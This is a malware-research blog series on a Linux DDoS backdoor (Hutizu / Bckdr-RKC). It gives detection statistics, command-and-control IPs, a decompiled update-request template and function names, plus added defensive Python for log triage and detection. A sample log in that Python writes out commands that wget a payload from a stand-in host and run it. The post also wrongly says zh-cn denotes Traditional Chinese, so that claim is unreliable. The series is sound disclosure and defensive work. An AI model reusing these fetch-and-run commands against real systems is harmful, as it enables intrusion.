
Hutizu/Huituzi - Follow the Gray Rabbit

Typing Huituzi (the Chinese phonetic string originally found in .ssyslog) into Google Translate with phonetic input for Chinese gives 灰兔子, which in Chinese apparently means "Gray Rabbit".

So, we now know the name of this amazing piece of malware.

According to Wikipedia, in Chinese literature, rabbits accompany Chang'e (the Chinese moon goddess) on the Moon. Also associated with the Chinese New Year (or Lunar New Year), rabbits are also one of the twelve celestial animals in the Chinese Zodiac for the Chinese calendar.

A very interesting note: This malware was discovered in 2011 - the Chinese year of the Metal Rabbit, or "Jīnshǔ tù" (金属兔).

The question remains - how deep does this rabbit hole go?

I'm updating all of my .ssyslog posts to include "Hutizu" since that is the official detection name.

Hutizu and Linux/Bckdr-RKC Detection Statistics

Let's take a look at current detection statistics for Linux/Bckdr-RKC.
The newer variant has been named the Hutizu backdoor by Antivirus vendors.

.xsyslog - The original file placed on my honeypot.
Commonly known as Linux/Bckdr-RKC or Linux/PKC

Metascan:
1/25 detection http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s9hg3hss792
Fortinet detects as Linux/PKC.A!tr.bdr

VirusTotal:
0/43 detection https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/1332284106/ 

VirScan:
3/36 detection http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b.html 
Fortinet detects as Linux/PKC.A!tr.bdr
Kaspersky detects as Backdoor.Linux.PKC.a

Sophos detects as Linux/Bckdr-RKC


.ssyslog - The newer variant
Commonly known as "Hutizu"

Metascan:
3/25 detection http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz64utld97m0
ArcaVir detects as Linux.Hutizu.a
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu

VirusTotal:
7/43 detection https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1332284644/ 
Comodo detects as UnclassifiedMalware
Emsisoft detects as Backdoor.Linux.Hutizu!IK
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A

VirScan:
8/36 detection http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c.html
a-squared detects as Backdoor.Linux.Hutizu!IK
ArcaVir detects as Linux.Hutizu.a
Comodo detects as UnclassifiedMalware
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A

This is good news, as it means anti-virus vendors are starting to detect this malware.

But the bad news is, only a small fraction of AV vendors are detecting it!

Hutizu Under the Hood

I've been looking at the STRINGS output of .ssyslog, which is now detected by a small number of AV vendors as "Hutizu":

http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ssyslog-strings.txt

A few interesting items jumped out at me.


Linux/Bckdr-RKC Delivery Method Analyzed

You can tell a lot about an attacker based upon their methods of attack.
-Automated attacks happen rapidly, with no time for typing
-Manual attacks happen slowly, as the attacker has to type commands
-Typos and misspellings indicate a manual attack
-The connection string gives away what kind of operating system the attacker is using
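As an added example (not from the original post), here is a small Python script that applies these heuristics to constructed honeypot log lines: it groups commands by session, measures the gap between consecutive commands, counts misspelled command names, and reads an operating-system hint from the SSH client banner. The log format, the 203.0.113.10 download host and the banner-to-OS mapping are assumptions.

```python
import re
from datetime import datetime
from statistics import median

# Constructed honeypot log (not from the original post): timestamp, session id,
# event type (CLIENT = SSH version banner, CMD = command typed) and payload.
SAMPLE_LOG = """\
2011-12-25 03:14:07 s1 CLIENT SSH-2.0-libssh-0.4.8
2011-12-25 03:14:07 s1 CMD cd /etc
2011-12-25 03:14:07 s1 CMD wget http://203.0.113.10:99/.xsyslog
2011-12-25 04:02:11 s2 CLIENT SSH-2.0-PuTTY_Release_0.62
2011-12-25 04:02:19 s2 CMD cd /tmp
2011-12-25 04:02:41 s2 CMD wgte http://203.0.113.10:99/.ssyslog
2011-12-25 04:02:55 s2 CMD wget http://203.0.113.10:99/.ssyslog
2011-12-25 04:03:30 s2 CMD ./.ssyslog
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (CLIENT|CMD) (.*)$")
CLIENT_OS_HINTS = {"PuTTY": "Windows", "OpenSSH": "Unix-like", "libssh": "scripted/library"}  # assumed heuristic
KNOWN_CMDS = {"cd", "wget", "curl", "chmod", "ls", "cat", "uname", "rm", "tar", "id"}

def parse_sessions(log_text):
    """Group lines by session: {sid: {"client": banner, "cmds": [(datetime, cmd), ...]}}."""
    sessions = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        s = sessions.setdefault(m.group(2), {"client": "", "cmds": []})
        if m.group(3) == "CLIENT":
            s["client"] = m.group(4)
        else:
            s["cmds"].append((ts, m.group(4)))
    return sessions

def typo_count(session):
    """Count commands whose first word is not a known binary (a typing slip such as 'wgte')."""
    return sum(1 for _, c in session["cmds"]
               if not c.startswith("./") and c.split()[0] not in KNOWN_CMDS)

def classify(session, manual_gap_s=2.0):
    """Return (verdict, median seconds between commands, OS hint taken from the banner)."""
    cmds = session["cmds"]
    gaps = [(b - a).total_seconds() for (a, _), (b, _) in zip(cmds, cmds[1:])]
    gap = median(gaps) if gaps else 0.0
    manual = gap >= manual_gap_s or typo_count(session) > 0
    os_hint = next((o for k, o in CLIENT_OS_HINTS.items() if k in session["client"]), "unknown")
    return ("manual" if manual else "automated"), gap, os_hint
```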

Let's take a look at both pieces of the Linux/Bckdr-RKC malware I've received. 

Hutizu aka Linux/Bckdr-RKC and Duqu Links? Food for Thought.

I can't put my finger on it, but after looking at this article on the mystery of the Duqu Framework, and looking at my publicly posted decompilation of Linux/Bckdr-RKC, something strikes me as very familiar between the two.

I've sent this to Kaspersky, so we'll see if they get back to me on it.

Can you see any similarities?  If so, please share!

UPDATE: The virus in question is now being detected by limited AV programs as the "Hutizu" backdoor.

UPDATED: Hutizu and Linux/Bckdr-RKC now have limited detection

UPDATE: The latest news on Linux/Bckdr-RKC (.xsyslog) and Hutizu (.ssyslog) can be viewed HERE, including newest detection statistics.  Thanks!


It's been approximately 2 months since the original discovery of Linux/Bckdr-RKC

This Linux trojan is still undetected, according to VirusTotal.com


Virustotal: .xsyslog
Virustotal: .ssyslog


In fact, it would appear that even Sophos is no longer detecting this trojan.

I have resubmitted the file to multiple antivirus vendors, in hopes that they may pay attention to my submission this time.

For those who aren't familiar with this trojan, an anonymous internet user has taken the time to put together a Pastebin post highlighting my research on this trojan.  http://pastebin.com/DwtX9dMd

I'd also like to take the time to point out that you can view the decompiled source of this trojan at my malware research Google code project: http://code.google.com/p/caffsec-malware-analysis/

Keep fighting the good fight.

Following the Trail: Determining the Origins of Linux/Bckdr-RKC

It is already known that the two Linux/Bckdr-RKC variants I have received have both been hosted by 216.83.44.229.  Furthermore, the first variant had a phone-home address of 216.83.44.226.

Both of these IP addresses are registered to the netblock owned by WIRELESS-ALARM.COM (not to be confused with the actual website wireless-alarm.com, which is registered to a different contact completely, and unrelated here).

Let's use what we already know to try to find the organization responsible for this malware.

Chinese Origins in .ssyslog Decompiled - Linux/Bckdr-RKC and Hutizu

I have partially decompiled the second piece of malware which was similar to the original Linux/Bckdr-RKC dropped on my honeypot.

Update: .ssyslog is now detected as "Hutizu".

I am publicly posting the first section of this file to highlight my findings so far...

Update: The full decompiled source of both pieces of malware is now available at Google Code

The first part of this decompiled code that really stood out was a clear marker that this malware is definitely of Chinese origin. This snippet of code is from the following function:
int autoupdate(char* url_address, char* local_to_file)
Code:

L0805FF50(&_v3660,
          "GET /%s HTTP/1.1\n"
          "Accept: */*\n"
          "Accept-Language: zh-cn\n"
          "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\n"
          "Host: %s:%d\n"
          "Connection: Close\n"
          "\n",
          &_v2380);
The "Accept-Language" of zh-cn represents Traditional Chinese as the desired web browse language.

This means the malware in question was most likely programmed by a native speaker of Chinese.  Add to this the fact that the malware is hosted by a fake corporation in China, and that the previous version of this malware also phoned home to the same fake corporation, this all becomes very interesting.
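As an added example that is not the post's own code, the following Python parses a request rendered from this template (constructed, with an assumed path; the download host and port are those named in the post) and lists the fields a network defender could alert on: the hard-coded Internet Explorer User-Agent coming from a Linux host, the zh-cn Accept-Language, and the non-standard port in the Host header.

```python
# Constructed request rendered from the decompiled template; the request path
# is an assumption, the Host value is the download address named in the post.
SAMPLE_REQUEST = (
    b"GET /update.bin HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Accept-Language: zh-cn\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n"
    b"Host: 216.83.44.229:99\r\n"
    b"Connection: Close\r\n"
    b"\r\n"
)
# The User-Agent string hard-coded in the sample's autoupdate() template.
TEMPLATE_UA = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, version, headers).
    Bare LF line endings are accepted too, since the template literal uses \\n."""
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0].decode("latin-1")
    lines = head.split("\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers

def indicators(headers, sender_os="Linux"):
    """Return the reasons a request resembles the Hutizu/Bckdr-RKC update fetch.
    sender_os is what the monitoring point knows about the originating host."""
    found = []
    ua = headers.get("user-agent", "")
    if "Windows" in ua and sender_os != "Windows":
        found.append("User-Agent claims Windows but the sender runs " + sender_os)
    if ua == TEMPLATE_UA:
        found.append("User-Agent equals the hard-coded template string")
    if headers.get("accept-language", "").lower() == "zh-cn":
        found.append("Accept-Language is zh-cn")
    host = headers.get("host", "")
    port = host.rsplit(":", 1)[1] if ":" in host else ""
    if port and port not in ("80", "443"):
        found.append("Host header names non-standard port " + port)
    return found
```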

Here are a few other function names from this latest version:
  • copy_myself(const char* name)
  • autostart(const char* inser_to_file)
  • int SendSevMonitor()
  • int SendServerPack()
  • GetNetPackets(long long unsigned int* lNetOut, long long unsigned int* lPacketOut)
  • int moniter(char* host)
  • int udpflood(_Unknown_base* ThreadData)
  • int synflood(_Unknown_base* ThreadData)
  • int synbigpacket(_Unknown_base* ThreadData)
  • int ackflood(_Unknown_base* ThreadData)
  • int ackbigpacket(_Unknown_base* ThreadData)
  • GetStructureDnsPacket(char* QueryDomain, char* QueryData, int* nQueryData)
  • int dnsflood(_Unknown_base* ThreadData)
  • int more_ip_dns_test(_Unknown_base* ThreadData)
  • int autoupdate(char* url_address, char* local_to_file)
  • int get_online_ip(char* domain, char* return_ip)
  • int parse_dns_response(char* return_ip)
  • parse_dns_name(unsigned char* chunk, unsigned char* ptr, char* out, int* len)
  • send_dns_request(const char* dns_name)
  • connect_to_server()
Make no mistake, this malware is clearly designed to perform reconnaissance on internal networks and disrupt communications when instructed to do so by the command and control server.

The malware has self-replication and automatic update capabilities.

I find this malware very disturbing.

What I find even more disturbing is the fact that since my submission of this malware to antivirus vendors, with the exception of Avira, who believes this file is clean, none of the antivirus vendors have completed their analysis.

These two pieces of malware seem very professionally crafted with a clear purpose - to serve as a "cyber weapon".

Linux/Bckdr-RKC: A New Variant Appears

Someone was busy this Christmas.

A new variant of Linux/Bckdr-RKC has been placed on my honeypot.

Unfortunately, Sophos's existing detection does not cover this variant, so I've sent it back to them for analysis.

I have posted the strings from the unpacked malware, as well as a diff between the strings of the old version and new version.

I will post updates as I can.

Linux/Bckdr-RKC Initial Analysis

A malicious user dropped off a VERY interesting piece of malware on my honeypot today with the filename ".xsyslog"

This piece of malware was previously undetected, and many kudos to Sophos for being the first to confirm my findings that the software was malicious.

So far, I have been able to determine the following:

This is a UPX packed Linux ELF which appears to have been around since late November 2011, according to internet searches.

The malware is installed on a compromised system after cracking an SSH server's root password, in the path /etc/.xsyslog

The malware is downloaded from an IP address which appears to be hosted in Hong Kong by a fake corporation: 216.83.44.229 port 99

It phones home to an IP address which appears to be hosted by the same fake corporation: 216.83.44.226 port 81
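An added example (not from the original post) for triaging a host for this dropper: it lists hidden files directly under a directory such as /etc that carry the ELF magic and flags those carrying the UPX marker. The demo() directory and its file contents are constructed; the UPX check is a heuristic, not a full unpacker.

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"
UPX_MAGIC = b"UPX!"

def classify_blob(data):
    """Return (is_elf, looks_upx_packed) for a file's bytes.
    UPX writes its 'UPX!' marker near the start of a packed ELF and in the
    trailer, so both ends are checked (heuristic; a stripped marker is missed)."""
    is_elf = data[:4] == ELF_MAGIC
    upx = UPX_MAGIC in data[:4096] or UPX_MAGIC in data[-4096:]
    return is_elf, upx

def scan_hidden_executables(directory):
    """List hidden regular files in directory (non-recursive) that are ELF,
    as (name, upx_flag) tuples, so a dot-file like /etc/.xsyslog stands out."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not name.startswith(".") or not os.path.isfile(path):
            continue
        with open(path, "rb") as f:
            data = f.read()
        is_elf, upx = classify_blob(data)
        if is_elf:
            hits.append((name, upx))
    return hits

def demo():
    """Build a constructed directory resembling the post's /etc drop and scan it."""
    d = tempfile.mkdtemp()
    fake_elf = ELF_MAGIC + b"\x01\x01\x01" + b"\x00" * 64 + UPX_MAGIC + b"\x00" * 64
    samples = {
        ".xsyslog": fake_elf,                      # constructed stand-in for the dropper
        ".hidden_rc": b"export PATH=/usr/bin\n",   # hidden but not an executable
        "hosts": b"127.0.0.1 localhost\n",         # ordinary visible file
    }
    for name, blob in samples.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(blob)
    return scan_hidden_executables(d)

if __name__ == "__main__":
    print(demo())
```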

I have uploaded all relevant strings within the unpacked file to Pastebin.

I will provide additional details as I find/receive them.  This malware has been forwarded to US-CERT, as well as multiple anti-virus vendors.

Track current AV coverage at http://md5.virscan.org/58c23ca549c941f0d44b35fa31d77011

Related Reading:
Sophos Whitepaper Protection for Mac and Linux Computers: Genuine Need or Nice to Have?